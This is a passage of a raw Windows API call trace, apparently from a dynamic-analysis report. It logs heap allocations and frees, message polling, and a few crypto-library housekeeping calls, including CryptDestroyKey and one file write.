dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0226.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0226.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0226.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0226.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0226.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0226.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0226.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.436] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0226.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.497] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0226.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0226.497] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.497] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.497] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.498] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.500] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf0dd8*, nNumberOfBytesToWrite=0x24f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0dd8*, lpNumberOfBytesWritten=0x8cf5e4*=0x24f8, lpOverlapped=0x0) returned 1 [0226.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0226.502] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0226.502] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0226.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.502] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0226.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51280, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0226.503] CryptDestroyKey (hKey=0xa875d0) returned 1 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0226.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0226.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0226.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.505] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.506] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.506] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.506] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0226.506] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.506] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0226.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0226.507] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0226.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.507] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0226.507] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0226.507] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.507] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.507] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.507] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0226.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.508] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.508] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.508] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.508] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0226.508] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.508] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 